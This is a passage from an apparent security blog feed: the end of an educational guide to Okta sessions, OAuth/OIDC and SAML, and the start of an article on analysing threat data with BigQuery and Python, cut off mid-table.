<p><em>Session Expiration Data</em>: Information about when the session will expire or needs to be refreshed. This is vital for security, ensuring that sessions don’t remain active indefinitely, which could pose a security risk.</p>
<p>The management of sessions, particularly their creation, maintenance, and timely expiration is a crucial aspect of web-based services. Effective session management ensures a balance between user convenience — by reducing the need for repeated logins — and security — by minimizing the risk of unauthorized access through abandoned or excessively long-lived sessions. In the interactions between the end-user, IdP, and SP, sessions facilitate a seamless yet secure flow of requests and responses, underpinning the overall security and usability of the service.</p>
<h3>Session initialization and authentication:</h3>
<p>Okta manages <a href="https://developer.okta.com/docs/concepts/session/">user sessions</a> beginning with the IdP session, which is established when a user successfully authenticates using their credentials, and potentially multi-factor authentication (MFA). This IdP session is key to accessing various applications integrated into an organization's Okta environment. For instance, an HTTP POST request to Okta's <code>/api/v1/authn</code> endpoint initiates this session by validating the user's credentials. In addition, the <a href="https://developer.okta.com/docs/api/openapi/okta-management/management/tag/Session/">Sessions endpoint API</a> can help facilitate creation and management at <code>/api/v1/sessions</code>.</p>
<p>Okta primarily uses cookies for session management, specifically in the context of identity provider (IdP) sessions. These cookies are crucial for maintaining the session state and user context across HTTP requests within the Okta environment. A typical session cookie retrieval for the end-user’s browser goes as follows:</p>
<ol>
<li>IdP or SP-initiated application access request</li>
<li>Authentication request either via OIDC or SAML</li>
<li>After successful credential validation, a session token is returned</li>
<li>Redirection to OIDC endpoint, session redirection, or application embed link for session cookie</li>
</ol>
<p>As detailed, when a user successfully authenticates, Okta ultimately sets a session cookie in the user’s browser. This cookie is then used to track the user session, allowing for seamless interaction with various applications without the need for re-authentication.</p>
<h3>Tokens vs cookies:</h3>
<p>While Okta utilizes tokens like ID and access tokens for API access and authorization, these tokens serve a different purpose from session cookies. Tokens are typically used in API interactions and are not responsible for maintaining the user’s session state. In contrast, session cookies are specifically designed for maintaining session continuity within the web browser, making them essential for web-based SSO and session management within Okta.</p>
<p>Session tokens are similar to client-side secrets, just like authorization codes during authorization requests. These secrets, along with the correct requests to specific API endpoints can allow an end-user, or adversary, to obtain a session cookie or access token which can then be used to make authenticated/authorized requests on behalf of the user. This should warrant increased security measures for session management and monitoring.</p>
<h3>Single sign-on (SSO):</h3>
<p><a href="https://www.okta.com/blog/2021/02/single-sign-on-sso/">SSO</a> is a critical feature in Okta's session management, allowing users to access multiple applications with a single set of credentials. This is achieved through protocols like SAML and OIDC, where an HTTP(S) request to the SAML endpoint, for instance, facilitates user authentication and grants access across different applications without the need for repeated logins.</p>
<p>In Single Sign-On (SSO) scenarios, Okta’s session cookies play a vital role. Once a user is authenticated and a session is established, the same session cookie facilitates access to multiple applications within the SSO framework by bundled with every service provider request. This eliminates the need for the user to log in separately to each application, streamlining the user experience.</p>
<h3>Session termination:</h3>
<p>Terminating a session in Okta can occur due to expiration. This can also occur from a user, SP, or IdP-initiated sign-out. An HTTP GET request to Okta's <code>/api/v1/sessions/me</code> endpoint can be used to terminate the user’s session. In the case of SSO, this termination can trigger a single logout (SLO), ending sessions across all accessed applications.</p>
<h3>Application sessions and additional controls:</h3>
<p>Application sessions are specific to the application a user accesses post-authentication with the IdP. Okta allows fine-grained control over these sessions, including different expiration policies for privileged versus non-privileged applications. Additionally, administrators can implement policies for single logout (<a href="https://support.okta.com/help/s/article/What-SLO-does-and-doesnt-do?language=en_US">SLO</a>) or local logout to further manage session lifecycles.</p>
<p>Understanding the mechanics of session initiation, management, and termination, as well as the role of tokens and cookies, is foundational for exploring deeper security topics. This knowledge is crucial when delving into areas like attack analysis and session hijacking, which will be discussed in later parts of this blog series.</p>
<p>More information on sessions can be found in <a href="https://developer.okta.com/docs/concepts/session/#application-session">Session management with Okta</a> or <a href="https://developer.okta.com/docs/api/openapi/okta-management/management/tag/Session/">Sessions for Developers</a>.</p>
<h1>Tenants</h1>
<p>In the SaaS realm, a <a href="https://developer.okta.com/docs/concepts/multi-tenancy/">tenant</a> is a distinct instance of software and infrastructure serving a specific user group. In Okta's <a href="https://developer.okta.com/docs/concepts/multi-tenancy/">multi-tenant</a> platform, this concept is key for configuring access control. Tenants can represent various groups, from internal employees to external contractors, each requiring unique access to applications. This is managed through Okta, serving as the IdP.</p>
<p>Tenants are versatile within Okta: they can be tailored based on security policies, user groups, roles, and profiles, allowing them to operate independently within the organization. This independence is crucial in multi-tenant environments, where distinct tenants are segregated based on factors like roles, data privacy, and regulatory requirements. Such setups are common in Okta, enabling users to manage diverse access needs efficiently.</p>
<p>In multi-org environments, Okta facilitates tenants across separate organizations through its UD. The configuration of each tenant is influenced by various factors including cost, performance, and data residency, with user types and profiles forming the basis of tenant setup. Additionally, features like delegated admin support and DNS customization for post-sign-in redirects are instrumental in managing tenant access.</p>
<p>Understanding the nuances of tenant configuration in Okta is vital, not only for effective administration but also for comprehending potential security challenges, such as the risk of <a href="https://github.com/pushsecurity/saas-attacks/blob/main/techniques/poisoned_tenants/description.md">poisoned tenants</a>.</p>
<h1>Authorization workflow</h1>
<p>As we discussed earlier, Okta - being an IdP - provides an authorization server as part of its services. It is critical to understand the authorization workflow that happens on the front and back-end channels. For this discussion and examples, we will use the client (end-user), authorization server (Okta), and SP (application server) as the actors involved.</p>
<h2>OAuth 2.0 and OIDC protocols</h2>
<h3>High-level overview of OAuth</h3>
<p>OAuth 2.0, defined in <a href="https://datatracker.ietf.org/doc/html/rfc6749">RFC 6749</a>, is a protocol for authorization. It enables third-party applications to gain limited access approved by the end-user or resource owner. Operating over HTTPS, it grants access tokens to authorize users, devices, APIs, servers, and applications.</p>
<p>Key OAuth terminology:</p>
<p><a href="https://www.oauth.com/oauth2-servers/scope/defining-scopes/">Scopes</a>: Define the permissions granted within an access token. They represent session permissions for each interaction with a resource server.</p>
<p>Consent: A process where end users or clients agree or disagree with the permissions (scopes) requested by a client application. For example, a consent screen in Google Workspace.</p>
<p><a href="http://Tokens">Tokens</a>: Includes access tokens for resource access and refresh tokens for obtaining new access tokens without re-authorizing.</p>
<p><a href="https://auth0.com/docs/get-started/applications/confidential-and-public-applications">Grants</a>: Data sent to the authorization server to receive an access token, like an authorization code granted post-authentication.</p>
<p><a href="https://auth0.com/docs/get-started/applications/confidential-and-public-applications">Clients</a>: In OAuth, clients are either 'confidential', able to securely store credentials, or 'public', which cannot.</p>
<p>Authorization Server: Mints OIDC and OAuth tokens and applies access policies, each with a unique URI and signing key.</p>
<p><a href="https://cloudentity.com/developers/basics/oauth-grant-types/authorization-code-flow/#:~:text=The%20user%20authenticates%20with%20their,server%20issues%20an%20authorization%20code.">Authorization Endpoint</a>: An API endpoint (/oauth/authorize) for user interaction and authorization.</p>
<p><a href="https://cloudentity.com/developers/basics/oauth-grant-types/authorization-code-flow/#:~:text=The%20user%20authenticates%20with%20their,server%20issues%20an%20authorization%20code.">Token Endpoint</a>: An API endpoint (/oauth/token) for clients to obtain access or refresh tokens, typically requiring a grant type like authorization code.</p>
<p>Resource Server (or Service Provider, SP): Provides services to authenticated users, requiring an access token.</p>
<p>Front-end Channel: Communication between the user’s browser and the authorization or resource server.</p>
<p>Back-end Channel: Machine-to-machine communication, such as between resource and authorization servers.</p>
<p>This streamlined overview covers the essentials of OAuth in the Okta ecosystem, focusing on its function, key terms, and components.</p>
<h3>High-level overview of OIDC</h3>
<p>At the beginning of this blog, we also discussed how <a href="https://openid.net/specs/openid-connect-core-1_0.html">OIDC</a> is an identity authentication protocol that sits on top of the OAuth authorization framework. While OAuth provides authorization, it has no current mechanism for authentication, thus where OIDC protocol comes in handy. The identity of the authenticated user is often called the resource owner.</p>
<p>The OIDC connect flow looks similar to the OAuth flow, however during the initial HTTPS request, scope=openid is added to be used so that not only an access token is returned from the authorization server but an ID token as well.</p>
<p>The ID token is formatted as a JSON Web Token (JWT) so that the client can extract information about the identity. This is unlike the access token, which the client passes to the resource server every time access is required. Data such as expiration, issuer, signature, email, and more can be found inside the JWT - these are also known as claims.</p>
<h2>Authorization code flow</h2>
<h3>Step 1 - Initial authorization request:</h3>
<p>The authorization code flow is initiated when the client sends an HTTP GET request to Okta’s authorization endpoint. This request is crucial in establishing the initial part of the OAuth 2.0 authorization framework.</p>
<p>Here’s a breakdown of the request components:</p>
<ul>
<li>Endpoint: The request is directed to <code>/oauth2/default/v1/authorize</code>, which is Okta’s authorization endpoint</li>
<li>Parameters:
<ul>
<li><code>response_type=code</code>: This parameter specified that the application is initiating an authorization code grant type flow.</li>
<li><code>client_id</code>: The unique identifier for the client application registered with Okta.</li>
<li><code>redirect_uri</code>: The URL to which Okta will send the authorization code.</li>
<li><code>scope</code>: Defines the level of access the application is requesting.</li>
</ul>
</li>
</ul>
<p>Example Request:</p>
<pre><code>GET /oauth2/default/v1/authorize?response_type=code \ 
&amp;client_id=CLIENT_ID&amp;redirect_uri=REDIRECT_URI&amp;scope=SCOPE
</code></pre>
<h3>Step 2 - User authentication and consent:</h3>
<p>Once the request is made, the user is prompted to authenticate with Okta and give consent for the requested scopes. This step is fundamental for user verification and to ensure that the user is informed about the type of access being granted to the application.</p>
<h3>Step 3 - Authorization code reception:</h3>
<p>Post authentication and consent, Okta responds to the client with an authorization code. This code is short-lived and is exchanged for a more permanent secret to make further requests - an access token.</p>
<p>Example token exchange request:</p>
<pre><code>POST /oauth2/default/v1/token
Content-Type: application/x-www-form-urlencoded

grant_type=authorization_code&amp;
code=AUTHORIZATION_CODE&amp;
redirect_uri=REDIRECT_URI&amp;
client_id=CLIENT_ID&amp;
client_secret=CLIENT_SECRET
</code></pre>
<h3>Step 4 - Redirect URIs and client authentication</h3>
<p>Redirect URIs play a pivotal role in the security of the OAuth 2.0 flow. They are pre-registered URLs to which Okta sends the authorization code. The integrity of these URIs is paramount, as they ensure that the response is only sent to the authorized client.</p>
<p>The client application is authenticated at the token endpoint, usually by providing the <code>client_id</code> and <code>client_secret</code>. This step is crucial to verify the identity of the client application and prevent unauthorized access.</p>
<h3>Step 5 - Token exchange</h3>
<p>In the final step, the client makes an HTTP POST request to Okta’s token endpoint, exchanging the authorization code for an access token. This access token is then used to make API requests on behalf of the user.</p>
<p>The inclusion of client credentials (client ID and client secret) in this request is a critical security measure, ensuring that the token is only issued to the legitimate client.</p>
<h2>Access tokens and scopes</h2>
<p>An <a href="https://www.okta.com/identity-101/access-token/">access token</a> is a compact code carrying extensive data about a user and their permissions. It serves as a digital key, facilitating communication between a server and a user's device. Commonly used in various websites, access tokens enable functionalities like logging in through one website (like Facebook) to access another (like Salesforce).</p>
<h3>Composition of an access token:</h3>
<p>An access token typically comprises three distinct parts, each serving a specific purpose:</p>
<ul>
<li><em>Header</em>: This section contains metadata about the token, including the type of token and the algorithm used for encryption.</li>
<li><em>Payload (claims)</em>: The core of the token, includes user-related information, permissions, group memberships, and expiration details. The payload dictates whether a user can access a specific resource, depending on the permissions granted within it. Developers can embed custom data in the payload, allowing for versatile applications, such as a single token granting access to multiple APIs.</li>
<li><em>Signature</em>: A hashed verification segment that confirms the token's authenticity. This makes the token secure and challenging to tamper with or replicate.</li>
</ul>
<p>A common format for access tokens JWT as we previously discussed, which is concise yet securely encodes all necessary information.</p>
<h3>Scopes and permissions:</h3>
<p><a href="https://developer.okta.com/docs/api/oauth2/">Scopes</a> in OAuth 2.0 are parameters that define the level and type of access the client requests. Each scope translates into specific permissions granted to the access token. For instance, a scope of email would grant the client application access to the user's email address. The granularity of scopes allows for precise control over what the client can and cannot do with the access token, adhering to the principle of least privilege.</p>
<h3>Token lifespan and refresh tokens:</h3>
<p>Access tokens are inherently short-lived for security reasons, reducing the window of opportunity for token misuse in case of unintended disclosure. Okta allows customization of <a href="https://support.okta.com/help/s/article/What-is-the-lifetime-of-the-JWT-tokens?language=en_US#:~:text=ID%20Token%3A%2060%20minutes,Refresh%20Token%3A%2090%20days">token lifespans</a> to suit different security postures. Once an access token expires, it can no longer be used to access resources.</p>
<p><a href="https://developer.okta.com/docs/guides/refresh-tokens/main/">Refresh tokens</a>, where employed, serve to extend the session without requiring the user to authenticate again. A refresh token can be exchanged for a new access token, thus maintaining the user's access continuity to the application. The use of refresh tokens is pivotal in applications where the user remains logged in for extended periods.</p>
<h3>Token storage:</h3>
<p>Regarding <a href="https://auth0.com/docs/secure/security-guidance/data-security/token-storage">token storage</a>, browser-based applications such as those utilizing services like Okta, are vital secure storage of access tokens is a critical aspect of user session management. These tokens are typically stored using one of several methods: browser in-memory storage, session cookies, or browser local/session storage. In-memory storage, preferred for its strong defense against XSS attacks, holds the token within the JavaScript memory space of the application, although it loses the token upon page refresh or closure. Session cookies offer enhanced security by being inaccessible to JavaScript, thereby reducing XSS vulnerabilities, but require careful implementation to avoid CSRF attacks. Local and session storage options, while convenient, are generally less recommended for sensitive data like access tokens due to their susceptibility to XSS attacks. The choice of storage method will depend on the application where a traditional web page, mobile device, or single-page app is being used.</p>
<h3>Security and expiration:</h3>
<p>The security of access tokens is of paramount importance in safeguarding user authentication and authorization processes, especially during their transmission over the internet. Encrypting these tokens is crucial, as it ensures that their contents remain confidential and impervious to unauthorized access. Equally important is the use of secure communication channels, notably HTTPS, to prevent the interception and compromise of tokens in transit. Furthermore, the signature component of a token, particularly in JWTs, plays a vital role in verifying its authenticity and integrity. This signature confirms that the token has not been altered and is genuinely issued by a trusted authority, thus preventing the risks associated with token forgery and replay attacks.</p>
<p>Access tokens are inherently designed with expiration mechanisms, a strategic choice to mitigate the risks associated with token theft or misuse. This finite lifespan of tokens necessitates regular renewal, typically managed through refresh tokens, thereby ensuring active session management and reducing opportunities for unauthorized use. The storage and handling of these tokens in client applications also significantly impact their overall security. Secure storage methods, such as in-memory or encrypted cookies, alongside careful management of token renewal processes, are essential to prevent unauthorized access and maintain the robustness of user sessions and access controls.</p>
<h1>Authentication workflow</h1>
<h2>Authentication vs authorization</h2>
<p>Before we dive into authentication in Okta, we should take a moment to understand the difference between authentication and authorization. To put it simply, authentication is providing evidence to prove identity, whereas authorization is about permissions and privileges once access is granted.</p>
<p>As we discussed throughout this blog, the Identity Engine and UD are critical to identity management in Okta. As a recap, the Identity Engine is used for enrolling, authentications, and authorizing users. The UD is used as the main directory service in Okta that contains users, groups, profiles, and policies, also serving as the source of truth for user data. The UD can be synchronized with other directory services such as AD or LDAP through the Okta endpoint agent.</p>
<p>Identity management can be managed via Okta or through an external IdP, such as Google Workspace. Essentially, when access to an application is requested, redirection to the authorization server’s endpoint APIs for authentication are generated to provide proof of identity.</p>
<p>Below are the main authentication protocols between the end user, resource server, and authorization server:</p>
<ul>
<li>OIDC: Authentication protocol that sits on top of the OAuth authorization framework. Workflow requires an ID token (JWT) to be obtained during an access token request.</li>
<li>SAML: Open standard protocol formatted in XML that facilitates user identity data exchange between SPs and IdPs.</li>
</ul>
<p>Within Okta, there is plenty of flexibility and customization regarding authentication. Basic authentication is supported where simple username and password schemes are used over HTTP with additional parameters and configurations.</p>
<h2>SAML in authentication</h2>
<p>As previously stated, <a href="https://developer.okta.com/docs/concepts/saml/">SAML</a> is a login standard that helps facilitate user access to applications based on HTTP(s) requests and sessions asynchronously. Over time the use of basic credentials for each application quickly became a challenge and thus federated identity was introduced to allow identity authentication across different SPs, facilitated by the identity providers.</p>
<p>SAML is primarily a web-based authentication mechanism as it relies on a flow of traffic between the end user, IdP, and SP. The SAML authentication flow can either be IdP or SP initiated depending on where the end user visits first for application access.</p>
<p>The SAML request is typically generated by the SP whereas the SAML response is generated by the IdP. The response contains the SAML assertion, which contains information about the authenticated user’s identity and a signed signature by the IdP.</p>
<p>It is important to note that during the SAML workflow, the IdP and SP typically never communicate directly, but instead rely on the end user’s browser for redirections. Typically, the SP trusts the IdP and thus the identity data forwarded through the user’s web browser to the SP is trusted in access is granted to the application requested.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/starter-guide-to-understanding-okta/image1.png" alt="Diagram depicting Okta SAML authentication process" /></p>
<p>In step 5 from the diagram above, the SAML assertion would be sent as part of this response after the user has authenticated with the IdP. Remember that the assertion is in XML format and can be quite extensive as it contains identity information for the SP to parse and rely on for the end user’s identity verification. Generic examples of SAML assertions are <a href="https://www.samltool.com/generic_sso_res.php">provided</a> by OneLogin. Auth0 also <a href="https://samltool.io/">provides</a> a decoder and parser for these examples as well which is shown in the image below.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/starter-guide-to-understanding-okta/image2.png" alt="Auth0 decoder and parser for SAML" /></p>
<h2>IdP vs SP responsibilities</h2>
<p>When discussing the roles and responsibilities of the SP and IdP, keep in mind that the SP is meant to provide access to applications for the end user, whereas the IdP provides authentication and authorization. The SP and IdP are typically set up to trust each other with their designated responsibilities. Depending on the end user, workflows for authentication and authorization can be SP or IdP initiated where RESTful API endpoints are typically depended on for each workflow. For authentication, requests and responses are sent from the IdP and SP but often proxied through the end user’s browser.</p>
<p>Although Okta is mainly an IdP and provides authentication and authorization services, it can also be used as an SP. Previously we discussed how Okta’s integration network allows for various 3rd-party applications to be connected and accessible to users through their dashboard. We also explained how authentication workflows can be SP initiated, meaning users could visit their Okta dashboard to request access to an application. At the same time, a 3rd-party IdP could be established such as Google Workspace or Azure AD which would handle the authentication and authorization of the user. If the user were to request access with this type of setup, Okta would then redirect the user to Azure AD for authentication.</p>
<h2>Single-factor vs multi-factor authentication</h2>
<p>Single-factor authentication (SFA) is the simplest form of authentication, requiring a user to supply one credential object for authentication. Commonly, users are familiar with password-based authentication methods where a username and password are supplied to validate themselves. This of course has security implications if the credentials used are stolen as they can be used by an adversary to login and access the same resources.</p>
<p>Multifactor authentication (MFA) is similar to SFA, except it requires two or more types of credentials or evidence to be supplied for authentication, typically in sequence. For example, a password-based credential may be supplied and once verified by the IdP, then requested by an OTP be supplied by a mobile device authenticator application, SMS message, email, and others. The common types of authentication factors are something that the user knows, possesses, or is inherent. This also increases the complexity to adversaries based on randomized string generation for OTPs and MFA token expirations.</p>
<p>Okta enables other types of authentication methods such as passwordless, risk-based, biometric, transaction, and others. A full list of authentication methods and descriptions can be found <a href="https://developer.okta.com/docs/concepts/iam-overview-authentication-factors/#authentication-methods">here</a>.</p>
<p>Every application or integration added to the Okta organization has an <a href="https://help.okta.com/oie/en-us/content/topics/identity-engine/policies/about-app-sign-on-policies.htm">authentication policy</a>, which verifies conditions for users who attempt to access each application. Authentication policies can also help enforce factor requirements based on these conditions where the UD and user profile are used to analyze information about the user. Authentication policies can be set globally for applications and users or can be more granular if set at the application level where specific user conditions are met. Authentication policies can be updated, cloned, preset, and merged if duplicate policies. Rules that define these granular conditions can be applied to these authentication policies with the Okta Expression Language (<a href="https://help.okta.com/oie/en-us/content/topics/identity-engine/devices/el-about.htm">EL</a>).</p>
<h2>Client-side and server-side communications</h2>
<p>Understanding the distinction between front-end (user-browser interactions) and back-end (server-to-server communications) is crucial in web-based authentication systems. Front-end interactions typically involve user interfaces and actions, while back-end channels handle critical exchanges like SAML assertions or OAuth tokens, crucial for secure authentication.</p>
<p>In Okta's framework, the interplay between browser and server is key for security and user experience. When a user logs in via Okta, the browser first authenticates with Okta, which then sends back the necessary tokens. These are forwarded to the application server which validates them with Okta, ensuring a secure, behind-the-scenes token exchange.</p>
<p>Okta’s token management is marked by stringent security. Issued tokens like ID and access tokens are securely exchanged among the user’s browser, Okta, and application servers. Protocols like HTTPS and OAuth 2.0 safeguard these transmissions. Features like token rotation and automatic revocation further bolster security, preventing unauthorized access.</p>
<p>Integrating Okta into an application reshapes its design and security. This offloads significant security responsibilities, allowing developers to focus on core functions. Such integration leads to a modular architecture, where authentication services are separate from application logic.</p>
<h1>Conclusion</h1>
<p>We’ve unraveled the complexities of Okta’s architecture and services, providing insights into its role as a leader in modern authentication and authorization. With the platform’s utilization of protocols like OAuth, OIDC, and SAML, Okta stands at the forefront of scalable, integrated solutions, seamlessly working with platforms such as Azure AD and Google Workspace.</p>
<p>Okta's SaaS design, featuring a RESTful API, makes it a versatile Identity Provider (IdP) and Service Provider (SP). Yet, its popularity also brings potential security vulnerabilities. For cybersecurity professionals, it’s crucial to grasp Okta’s complexities to stay ahead of evolving threats. This introduction sets the stage for upcoming deeper analyses of Okta's attack surface, the setup of a threat detection lab, and the exploration of common attacks.</p>
<p>Armed with this knowledge, you’re now better equipped to analyze, understand, and mitigate the evolving cybersecurity challenges associated with Okta’s ecosystem.</p>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/es/security-labs/assets/images/starter-guide-to-understanding-okta/photo-edited-09.png" length="0" type="image/png"/>
        </item>
        <item>
            <title><![CDATA[Google Cloud for Cyber Data Analytics]]></title>
            <link>https://www.elastic.co/es/security-labs/google-cloud-for-cyber-data-analytics</link>
            <guid>google-cloud-for-cyber-data-analytics</guid>
            <pubDate>Thu, 14 Dec 2023 00:00:00 GMT</pubDate>
            <description><![CDATA[This article explains how we conduct comprehensive cyber threat data analysis using Google Cloud, from data extraction and preprocessing to trend analysis and presentation. It emphasizes the value of BigQuery, Python, and Google Sheets - showcasing how to refine and visualize data for insightful cybersecurity analysis.]]></description>
            <content:encoded><![CDATA[<h1>Introduction</h1>
<p>In today's digital age, the sheer volume of data generated by devices and systems can be both a challenge and an opportunity for security practitioners. Analyzing a high magnitude of data to craft valuable or actionable insights on cyber attack trends requires precise tools and methodologies.</p>
<p>Before you delve into the task of data analysis, you might find yourself asking:</p>
<ul>
<li>What specific questions am I aiming to answer, and do I possess the necessary data?</li>
<li>Where is all the pertinent data located?</li>
<li>How can I gain access to this data?</li>
<li>Upon accessing the data, what steps are involved in understanding and organizing it?</li>
<li>Which tools are most effective for extracting, interpreting, or visualizing the data?</li>
<li>Should I analyze the raw data immediately or wait until it has been processed?</li>
<li>Most crucially, what actionable insights can be derived from the data?</li>
</ul>
<p>If these questions resonate with you, you're on the right path. Welcome to the world of Google Cloud, where we'll address these queries and guide you through the process of creating a comprehensive report.</p>
<p>Our approach will include several steps in the following order:</p>
<p><strong>Exploration:</strong> We start by thoroughly understanding the data at our disposal. This phase involves identifying potential insights we aim to uncover and verifying the availability of the required data.</p>
<p><strong>Extraction:</strong> Here, we gather the necessary data, focusing on the most relevant and current information for our analysis.</p>
<p><strong>Pre-processing and transformation:</strong> At this stage, we prepare the data for analysis. This involves normalizing (cleaning, organizing, and structuring) the data to ensure its readiness for further processing.</p>
<p><strong>Trend analysis:</strong> The majority of our threat findings and observations derive from this effort. We analyze the processed data for patterns, trends, and anomalies. Techniques such as time series analysis and aggregation are employed to understand the evolution of threats over time and to highlight significant cyber attacks across various platforms.</p>
<p><strong>Reduction:</strong> In this step, we distill the data to its most relevant elements, focusing on the most significant and insightful aspects.</p>
<p><strong>Presentation:</strong> The final step is about presenting our findings. Utilizing tools from Google Workspace, we aim to display our insights in a clear, concise, and visually-engaging manner.</p>
<p><strong>Conclusion:</strong> Reflecting on this journey, we'll discuss the importance of having the right analytical tools. We'll highlight how Google Cloud Platform (GCP) provides an ideal environment for analyzing cyber threat data, allowing us to transform raw data into meaningful insights.</p>
<h1>Exploration: Determining available data</h1>
<p>Before diving into any sophisticated analyses, it's necessary to prepare by establishing an understanding of the data landscape we intend to study.</p>
<p>Here's our approach:</p>
<ol>
<li><strong>Identifying available data:</strong> The first step is to ascertain what data is accessible. This could include malware phenomena, endpoint anomalies, cloud signals, etc. Confirming the availability of these data types is essential.</li>
<li><strong>Locating the data stores:</strong> Determining the exact location of our data. Knowing where our data resides – whether in databases, data lakes, or other storage solutions – helps streamline the subsequent analysis process.</li>
<li><strong>Accessing the data:</strong> It’s important to ensure that we have the necessary permissions or credentials to access the datasets we need. If we don’t, attempting to identify and request access from the resource owner is necessary.</li>
<li><strong>Understanding the data schema:</strong> Comprehending the structure of our data is vital. Knowing the schema aids in planning the analysis process effectively.</li>
<li><strong>Evaluating data quality:</strong> Just like any thorough analysis, assessing the quality of the data is crucial. We check whether the data is segmented and detailed enough for a meaningful trend analysis.</li>
</ol>
<p>This phase is about ensuring that our analysis is based on solid and realistic foundations. For a report like the <a href="http://www.elastic.co/es/gtr">Global Threat Report</a>, we rely on rich and pertinent datasets such as:</p>
<ul>
<li><strong>Cloud signal data:</strong> This includes data from global Security Information and Event Management (SIEM) alerts, especially focusing on cloud platforms like AWS, GCP, and Azure. This data is often sourced from <a href="https://github.com/elastic/detection-rules">public detection rules</a>.</li>
<li><strong>Endpoint alert data:</strong> Data collected from the global <a href="https://docs.elastic.co/en/integrations/endpoint">Elastic Defend</a> alerts, incorporating a variety of public <a href="https://github.com/elastic/protections-artifacts/tree/main/behavior">endpoint behavior rules</a>.</li>
<li><strong>Malware data:</strong> This involves data from global Elastic Defend alerts, enriched with <a href="https://www.elastic.co/es/blog/introducing-elastic-endpoint-security">MalwareScore</a> and public <a href="https://github.com/elastic/protections-artifacts/tree/main/yara">YARA rules</a>.</li>
</ul>
<p>Each dataset is categorized and enriched for context with frameworks like <a href="https://attack.mitre.org/">MITRE ATT&amp;CK</a>, Elastic Stack details, and customer insights. Storage solutions of Google Cloud Platform, such as BigQuery and Google Cloud Storage (GCS) buckets, provide a robust infrastructure for our analysis.</p>
<p>It's also important to set a data “freshness” threshold, excluding data not older than 365 days for an annual report, to ensure relevance and accuracy.</p>
<p>Lastly, remember to choose data that offers an unbiased perspective. Excluding or including internal data should be an intentional, strategic decision based on its relevance to your visibility.</p>
<p>In summary, selecting the right tools and datasets is fundamental to creating a comprehensive and insightful analysis. Each choice contributes uniquely to the overall effectiveness of the data analysis, ensuring that the final insights are both valuable and impactful.</p>
<h1>Extraction: The first step in data analysis</h1>
<p>Having identified and located the necessary data, the next step in our analytical journey is to extract this data from our storage solutions. This phase is critical, as it sets the stage for the in-depth analysis that follows.</p>
<h2>Data extraction tools and techniques</h2>
<p>Various tools and programming languages can be utilized for data extraction, including Python, R, Go, Jupyter Notebooks, and Looker Studio. Each tool offers unique advantages, and the choice depends on the specific needs of your analysis.</p>
<p>In our data extraction efforts, we have found the most success from a combination of <a href="https://cloud.google.com/bigquery?hl=en">BigQuery</a>, <a href="https://colab.google/">Colab Notebooks</a>, <a href="https://cloud.google.com/storage/docs/json_api/v1/buckets">buckets</a>, and <a href="https://workspace.google.com/">Google Workspace</a> to extract the required data. Colab Notebooks, akin to Jupyter Notebooks, operate within Google's cloud environment, providing a seamless integration with other Google Cloud services.</p>
<h2>BigQuery for data staging and querying</h2>
<p>In the analysis process, a key step is to &quot;stage&quot; our datasets using BigQuery. This involves utilizing BigQuery queries to create and save objects, thereby making them reusable and shareable across our team. We achieve this by employing the <a href="https://hevodata.com/learn/google-bigquery-create-table/#b2">CREATE TABLE</a> statement, which allows us to combine multiple <a href="https://cloud.google.com/bigquery/docs/datasets-intro">datasets</a> such as endpoint behavior alerts, customer data, and rule data into a single, comprehensive dataset.</p>
<p>This consolidated dataset is then stored in a BigQuery table specifically designated for this purpose–for this example, we’ll refer to it as the “Global Threat Report” dataset. This approach is applied consistently across different types of data, including both cloud signals and malware datasets.</p>
<p>The newly created data table, for instance, might be named <code>elastic.global_threat_report.ep_behavior_raw</code>. This naming convention, defined by BigQuery, helps in organizing and locating the datasets effectively, which is crucial for the subsequent stages of the extraction process.</p>
<p>An example of a BigQuery query used in this process might look like this:</p>
<pre><code>CREATE TABLE elastic.global_threat_report.ep_behavior_raw AS
SELECT * FROM ...
</code></pre>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/google-cloud-for-cyber-data-analytics/image8.png" alt="Diagram for BigQuery query to an exported dataset table" />
Diagram for BigQuery query to an exported dataset table</p>
<p>We also use the <a href="https://cloud.google.com/bigquery/docs/reference/standard-sql/other-statements#export_data_statement">EXPORT DATA</a> statement in BigQuery to transfer tables to other GCP services, like exporting them to Google Cloud Storage (GCS) buckets in <a href="https://parquet.apache.org/">parquet file format</a>.</p>
<pre><code>EXPORT DATA
  OPTIONS (
    uri = 'gs://**/ep_behavior/*.parquet',
    format = 'parquet',
    overwrite = true
  )
AS (
SELECT * FROM `project.global_threat_report.2023_pre_norm_ep_behavior`
)
</code></pre>
<h2>Colab Notebooks for loading staged datasets</h2>
<p><a href="https://colab.research.google.com/">Colab Notebooks</a> are instrumental in organizing our data extraction process. They allow for easy access and management of data scripts stored in platforms like GitHub and Google Drive.</p>
<p>For authentication and authorization, we use Google Workspace credentials, simplifying access to various Google Cloud services, including BigQuery and Colab Notebooks. Here's a basic example of how authentication is handled:</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/google-cloud-for-cyber-data-analytics/image9.png" alt="Diagram for authentication and authorization between Google Cloud services" />
Diagram for authentication and authorization between Google Cloud services</p>
<p>For those new to <a href="https://jupyter-notebook-beginner-guide.readthedocs.io/en/latest/">Jupyter Notebooks</a> or dataframes, it's beneficial to spend time becoming familiar with these tools. They are fundamental in any data analyst's toolkit, allowing for efficient code management, data analysis, and structuring. Mastery of these tools is key to effective data analysis.</p>
<p>Upon creating a notebook in Google Colab, we're ready to extract our custom tables (such as project.global_threat_report.ep_behavior_raw) from BigQuery. This data is then loaded into Pandas Dataframes, a Python library that facilitates data manipulation and analysis. While handling large datasets with Python can be challenging, Google Colab provides robust virtual computing resources. If needed, these resources can be scaled up through the Google Cloud <a href="https://console.cloud.google.com/marketplace/product/colab-marketplace-image-public/colab">Marketplace</a> or the Google Cloud Console, ensuring that even large datasets can be processed efficiently.</p>
<h2>Essential Python libraries for data analysis</h2>
<p>In our data analysis process, we utilize various Python libraries, each serving a specific purpose:</p>
<table>
<thead>
<tr>
<th>Library</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="https://docs.python.org/3/library/datetime.html">datetime</a></td>
<td>Essential for handling all operations related to date and time in your data. It allows you to manipulate and format date and time information for analysis.</td>
</tr>
<tr>
<td><a href="https://google-auth.readthedocs.io/en/master/">google.auth</a></td>
<td>Manages authentication and access permissions, ensuring secure access to Google Cloud services. It's key for controlling who can access your data and services.</td>
</tr>
<tr>
